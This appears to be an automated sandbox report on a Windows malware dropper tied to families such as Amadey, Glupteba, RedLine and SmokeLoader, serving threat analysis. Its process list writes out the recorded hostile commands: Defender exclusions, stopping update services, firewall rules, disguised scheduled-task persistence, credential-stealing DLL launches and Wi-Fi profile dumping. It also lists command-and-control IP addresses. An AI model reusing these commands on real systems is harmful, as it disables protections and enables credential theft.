Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-f8dcgsgg8v
Target 0x0006000000022e0b-53.dat
SHA256 2feb86916ad5d142307fd88970fc88b90c3e34abbbbdbf8cdd8748ba04ed0739
Tags
amadey glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan dcrat xmrig microsoft paypal collection discovery miner phishing spyware upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2feb86916ad5d142307fd88970fc88b90c3e34abbbbdbf8cdd8748ba04ed0739

Threat Level: Known bad

The file 0x0006000000022e0b-53.dat was found to be: Known bad.

Malicious Activity Summary

amadey glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan dcrat xmrig microsoft paypal collection discovery miner phishing spyware upx

Modifies Windows Defender Real-time Protection settings

RedLine

RedLine payload

Raccoon

ZGRat

xmrig

Amadey

SmokeLoader

Glupteba

Smokeloader family

SectopRAT payload

Glupteba payload

DcRat

Detect ZGRat V1

SectopRAT

Raccoon Stealer payload

XMRig Miner payload

Modifies Windows Firewall

Blocklisted process makes network request

Downloads MZ/PE file

Stops running service(s)

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Deletes itself

Windows security modification

UPX packed file

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Detected potential entity reuse from brand microsoft.

Detected potential entity reuse from brand paypal.

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Suspicious behavior: MapViewOfSection

outlook_office_path

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 05:32

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 05:32

Reported

2023-10-31 05:34

Platform

win7-20231023-en

Max time kernel

23s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\9914.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 2680 N/A N/A C:\Users\Admin\AppData\Local\Temp\9914.exe
PID 1404 wrote to memory of 3064 N/A N/A C:\Users\Admin\AppData\Local\Temp\9ABA.exe
PID 1404 wrote to memory of 3064 N/A N/A C:\Users\Admin\AppData\Local\Temp\9ABA.exe
PID 1404 wrote to memory of 3064 N/A N/A C:\Users\Admin\AppData\Local\Temp\9ABA.exe
PID 1404 wrote to memory of 3064 N/A N/A C:\Users\Admin\AppData\Local\Temp\9ABA.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2680 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\9914.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 1404 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2700 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 2744 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe

"C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe"

C:\Users\Admin\AppData\Local\Temp\9914.exe

C:\Users\Admin\AppData\Local\Temp\9914.exe

C:\Users\Admin\AppData\Local\Temp\9ABA.exe

C:\Users\Admin\AppData\Local\Temp\9ABA.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\9C22.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe

C:\Users\Admin\AppData\Local\Temp\9D1D.exe

C:\Users\Admin\AppData\Local\Temp\9D1D.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\A48D.exe

C:\Users\Admin\AppData\Local\Temp\A48D.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2740 CREDAT:275457 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\A79A.exe

C:\Users\Admin\AppData\Local\Temp\A79A.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 268

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\AB72.exe

C:\Users\Admin\AppData\Local\Temp\AB72.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\C74C.exe

C:\Users\Admin\AppData\Local\Temp\C74C.exe

C:\Users\Admin\AppData\Local\Temp\D013.exe

C:\Users\Admin\AppData\Local\Temp\D013.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8CA41A48-63E6-42C4-BF6C-249A6F6CD7AB} S-1-5-21-3425689832-2386927309-2650718742-1000:AWDHTXES\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\F0ED.exe

C:\Users\Admin\AppData\Local\Temp\F0ED.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\F976.exe

C:\Users\Admin\AppData\Local\Temp\F976.exe

C:\Users\Admin\AppData\Local\Temp\1B1.exe

C:\Users\Admin\AppData\Local\Temp\1B1.exe

C:\Users\Admin\AppData\Local\Temp\11A9.exe

C:\Users\Admin\AppData\Local\Temp\11A9.exe

C:\Users\Admin\AppData\Local\Temp\1E28.exe

C:\Users\Admin\AppData\Local\Temp\1E28.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:R" /E

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {0C24093F-EED9-4D43-9A48-C1153C6DE760} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231031053351.log C:\Windows\Logs\CBS\CbsPersist_20231031053351.cab

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 www.facebook.com udp
RU 193.233.255.73:80 193.233.255.73 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
BG 171.22.28.239:42359 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
